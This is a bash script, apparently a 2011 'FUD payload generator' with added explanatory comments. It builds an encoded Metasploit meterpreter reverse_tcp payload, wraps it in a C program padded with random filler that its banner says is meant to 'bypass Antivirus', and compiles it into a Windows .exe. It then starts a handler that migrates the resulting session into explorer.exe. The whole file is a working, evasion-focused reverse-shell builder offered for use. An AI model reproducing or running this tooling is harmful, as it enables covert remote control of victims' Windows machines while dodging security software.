- #!/bin/bash
- # Source: http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/
- # Purpose: interactive script that wraps an encoded Metasploit windows/meterpreter/reverse_tcp payload in a C program padded with random filler, cross-compiles it to a Windows .exe, then starts the matching handler. Install the following packages if they are not already installed:
- # apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
- echo "************************************************************"
- echo " Automatic shellcode generator - FOR METASPLOIT "
- echo " By Astr0baby 2011 "
- echo " With some Randomic gravy and sauce to bypass Antivirus "
- echo " For Automatic Teensy programming and deployment "
- echo "************************************************************"
- rm -rf ShellCode # deletes any ShellCode directory left in the current directory by an earlier run, without prompting
- echo "Here is a network device list available on yor machine"
- cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d' # keeps the first two space-separated fields of each /proc/net/dev line and drops the two header lines
- echo -e "What network interface are we gonna use ? \c"
- read interface # used unquoted and unvalidated in the ifconfig call below
- echo -e "What Port Number are we gonna listen to? : \c"
- read port # passed as LPORT to both the payload and the handler; not validated
- echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
- read seed # number of filler lines kept by the two head calls below; not checked against the prompted 1-10000 range
- echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
- read enumber # iteration count handed to every msfencode stage via -c; not validated
- # Get OS name
- OS=`uname`
- IO="" # store IP -- NOTE(review): this assigns IO, which nothing else in the script reads; IP is first set by the case below
- case $OS in
- Linux) IP=`ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;; # 'inet addr:' value(s) reported for the chosen interface, excluding 127.0.0.1; IP is empty when no such line matches
- *) IP="Unknown";; # any non-Linux uname leaves the literal string "Unknown", which is still passed on as LHOST
- esac
- # echo "$IP"   (debug print, disabled)
- ./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw | ./msfencode -e x86/shikata_ga_nai -c $enumber > test.c # raw reverse_tcp payload piped through four msfencode stages, each run $enumber times; the last stage has no -t, so test.c holds msfencode's default text output. Encoding changes only the stored bytes: the payload is still a reverse TCP connection to LHOST:LPORT
- mkdir ShellCode
- mv test.c ShellCode
- cd ShellCode # not checked: if this fails, the file operations and rm -f calls below run in the starting directory
- # Replace every '+' in test.c with a space (the /g substitution is not limited to line ends)
- sed -e 's/+/ /g' test.c > clean.c
- sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c # turns the generated 'buf = ' assignment into a C array declaration named micro
- echo "#include <stdio.h>" >> temp # temp becomes the head of the C source
- echo 'unsigned char ufs[]=' >> temp # opens the initializer of a filler array named ufs
- for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2 # numbers 1..10000 ordered by a $RANDOM key; the first $seed of them become filler lines
- sed -i 's/$/"/' temp2 # append a closing quote to each filler line
- sed -i 's/^/"/' temp2 # prepend an opening quote, so each line is a C string literal
- echo ';' >> temp2 # terminates the ufs initializer
- cat temp2 >> temp # filler array body first
- cat ready.c >> temp # then the micro[] array holding the encoded payload
- mv temp ready2.c
- echo ";" >> ready2.c # presumably terminates the micro[] initializer that ready.c leaves open -- confirm against the msfencode output
- echo "int main(void) { ((void (*)())micro)();}" >> ready2.c # main() casts the micro byte array to a function pointer and calls it, i.e. runs the embedded bytes as code
- mv ready2.c final.c
- echo 'unsigned char tap[]=' > temp3 # second filler array, tap, appended after main()
- for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4 # same shuffle over 1..999999, again truncated to $seed lines
- sed -i 's/$/"/' temp4 # closing quote on each filler line
- sed -i 's/^/"/' temp4 # opening quote on each filler line
- echo ';' >> temp4 # terminates the tap initializer
- cat temp4 >> temp3
- cat temp3 >> final.c
- # Cleanup of intermediate files; only final.c is left for the compile step
- rm -f clean.c
- rm -f test.c
- rm -f ready.c
- rm -f rand.c # rand.c is never created by this script; with -f this is a no-op
- rm -f temp2
- rm -f temp3
- rm -f temp4
- /usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1 # cross-compiles with the mingw32 gcc at a fixed path; all compiler output is discarded, so a failed build only shows up when the mv below fails
- mv final.exe $RANDOM.exe # numeric file name from $RANDOM; together with the shuffled filler, name and file hash differ on every run, so neither identifies another build
- filex=`ls -ct1 | head -1` # takes the newest directory entry by ctime as the output file name
- sumx=`sha1sum $filex` # NOTE(review): computed before the strip below, so the printed SHA-1 is of the file as it was before stripping
- echo $filex "...generated in ShellCode subfolder"
- echo $filex "sha1checksum is .." $sumx
- strip --strip-debug $filex # removes debug symbols from the executable, after its checksum was already printed
- cd ..
- echo " starting the meterpreter listener..."
- sleep 2
- ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2 explorer.exe' E # starts exploit/multi/handler for the same payload, LHOST and LPORT; AutoRunScript names 'migrate2' with argument explorer.exe, to run when a session opens